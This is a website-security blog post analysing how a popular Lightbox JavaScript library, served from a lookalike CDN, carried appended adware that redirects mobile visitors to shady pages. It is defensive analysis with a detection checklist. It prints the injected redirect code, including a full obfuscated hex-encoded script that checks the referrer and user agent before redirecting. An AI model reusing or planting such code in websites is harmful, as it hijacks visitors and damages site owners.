Lightbox Adware – From Innocent Scripts to Malicious Redirects

It’s no news that webmasters commonly make use of external scripts to add more features to their site, but things can turn out for the worse quite easily.

What if other scripts start behaving the same?

What if they start to use your website to spread ransomware?

Visitors Redirected to Random Websites on Mobile

Recently, we received a case where visitors who accessed a site via mobile were redirected to various random sites.

Upon closer inspection, we found that the culprit was this external script:

This script is used quite frequently by various webmasters to provide easy Lightbox functionalities on their websites.

Dissecting the Script

A quick look at the script shows us that it instantly makes a call to another script:

hxxp://dimsemenov-static[.]s3-cdn[.]com/js/get-js.js

Now, after decoding the file we can see that this script does indeed provide Lightbox functionalities. It also has a very particular set of lines appended to it:

(window, document, window[window.popns || uF6x.A(1)]);

s3_cdn_com.config({

perpage: 1

}).add('hxxp://click[.]thebestoffer[.]gq/?utm_medium=6a9d4be48f9dd74ece2547f9a7d3ed068107809c&utm_campaign=js_1&1=&2=', {

device: 'mobile',

cookieExpires: 86400,

noReferer: true

});

This piece of code will redirect mobile users to hxxp://click[.]thebestoffer[.]gq/?utm_medium=6a9d4be48f9dd74ece2547f9a7d3ed068107809c&utm_campaign=js_1&1=&2=

From there, the visitor would be taken to various pages such as ones that display certain apps for download and install, or just random tech articles.

If the visitors choose to install any of those apps, they are then taken to the respective official store’s webpage for the app.

After some time, the script had already changed into a different campaign. Here we can see the contents:

var _0x3ae7=["\x65\x78\x70\x69\x72\x65\x73","\x6E\x75\x6D\x62\x65\x72","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x3D","\x3B\x20","\x63\x6F\x6F\x6B\x69\x65","\x28\x3F\x3A\x5E\x7C\x3B\x20\x29","\x5C\x24\x31","\x72\x65\x70\x6C\x61\x63\x65","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29","\x6D\x61\x74\x63\x68","\x61","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x72\x65\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x67\x6F\x77\x65\x73\x74\x63\x6F\x6F\x6B\x69\x65","\x74\x72\x75\x65","\x2F","\x72\x65\x66\x65\x72\x72\x65\x72","\x67\x6F\x6F\x67\x6C\x65\x2E","\x69\x6E\x64\x65\x78\x4F\x66","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x79\x6F\x75\x2E\x31\x67\x6F\x77\x65\x73\x74\x2E\x74\x6F\x70\x2F\x3F\x75\x74\x6D\x5F\x6D\x65\x64\x69\x75\x6D\x3D\x38\x37\x65\x34\x61\x64\x34\x65\x35\x38\x37\x64\x36\x61\x33\x63\x36\x36\x38\x65\x34\x64\x64\x61\x35\x37\x61\x33\x31\x65\x61\x36\x30\x61\x30\x32\x33\x35\x62\x32\x26\x75\x74\x6D\x5F\x63\x61\x6D\x70\x61\x69\x67\x6E\x3D\x31\x67\x6F\x77\x65\x73\x74"];function gowest_setCookie(_0x564cx2,_0x564cx3,_0x564cx4){_0x564cx4= _0x564cx4|| {};var _0x564cx5=_0x564cx4[_0x3ae7[0]];if( typeof _0x564cx5== _0x3ae7[1]&& _0x564cx5){var _0x564cx6= new Date();_0x564cx6[_0x3ae7[3]](_0x564cx6[_0x3ae7[2]]()+ _0x564cx5* 1000);_0x564cx5= _0x564cx4[_0x3ae7[0]]= _0x564cx6};if(_0x564cx5&& _0x564cx5[_0x3ae7[4]]){_0x564cx4[_0x3ae7[0]]= _0x564cx5[_0x3ae7[4]]()};_0x564cx3= encodeURIComponent(_0x564cx3);var _0x564cx7=_0x564cx2+ _0x3ae7[5]+ _0x564cx3;for(var _0x564cx8 in _0x564cx4){_0x564cx7+= _0x3ae7[6]+ _0x564cx8;var _0x564cx9=_0x564cx4[_0x564cx8];if(_0x564cx9!== true){_0x564cx7+= _0x3ae7[5]+ _0x564cx9}};document[_0x3ae7[7]]= _0x564cx7}function gowest_getCookie(_0x564cx2){var _0x564cxb=document[_0x3ae7[7]][_0x3ae7[12]]( new RegExp(_0x3ae7[8]+ _0x564cx2[_0x3ae7[10]](/([\.$?*|{}\(\)\[\]\\\/\+^])/g,_0x3ae7[9])+ _0x3ae7[11]));return _0x564cxb?decodeURIComponent(_0x564cxb[1]):undefined}function gowest_parseURL(_0x564cxd){var _0x564cxe=document[_0x3ae7[14]](_0x3ae7[13]);_0x564cxe[_0x3ae7[15]]= _0x564cxd;return _0x564cxe[_0x3ae7[16]]}function gowestnow(){if(!gowest_getCookie(_0x3ae7[17])){gowest_setCookie(_0x3ae7[17],_0x3ae7[18],{expires:3600* 24* 30,path:_0x3ae7[19]});var _0x564cx10=gowest_parseURL(document[_0x3ae7[20]]);if(_0x564cx10[_0x3ae7[22]](_0x3ae7[21])!=  -1){if(/Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobi/i[_0x3ae7[24]](navigator[_0x3ae7[23]])){location[_0x3ae7[10]](_0x3ae7[25])}}}}gowestnow()

This will redirect the visitor to: hxxps://you.1gowest[.]top/?utm_medium=87e4ad4e587d6a3c668e4dda57a31ea60a0235b2&utm_campaign=1gowest, which in turn will land the visitor to another shady looking page.

Is This Script Malicious?

In order to determine if this script behavior can be considered malicious or not, here is  a quick checklist:

• Are visitors being redirected? Yes.
• Is it targeting only mobile browsers? Yes.
• Are visitors landing on pages that redirect to unwanted software on iTunes and Google Play stores? Yes.
• Is it possible that the redirects may lead to malicious software or content? Yes.

So far, there hasn’t been anything extremely malicious, such as ransomware. However, this undesired redirect and the unclear communication of this “feature” by the script developers defines this as malicious behavior.

Why Would the Developer Add Malicious Redirects?

It’s always hard to make a buck on software. It’s even harder when you are providing it for free. In those cases, including paid advertisement is the easiest way for the developer to generate revenue on the downloaded tool, app, or script.

Sometimes the developer may include ads from networks that don’t filter malicious campaigns properly, causing problems as described here. Or the tool may become popular and sold to a not so well-intended group that may add malicious code as a new “feature” on the next update.

Conclusion

It’s important that webmasters are mindful of every external asset added to the website. They should understand that those assets can very quickly turn against you—damaging the visitor experience and your site’s reputation.

This is not the first time we’ve seen apparently legitimate assets going to the dark side. Here are some previous cases in which scripts became malicious redirects:

• SweetCAPTCHA Returns Hijacking Another Plugin
• When Your Plugins Turn Against You
• When a WordPress Plugin Goes Bad
• SweetCAPTCHA Service Used to Distribute Adware


If you are looking for peace of mind, we recommend adding your website to our website security platform that includes malware detection, protection, and response in case of a website hack.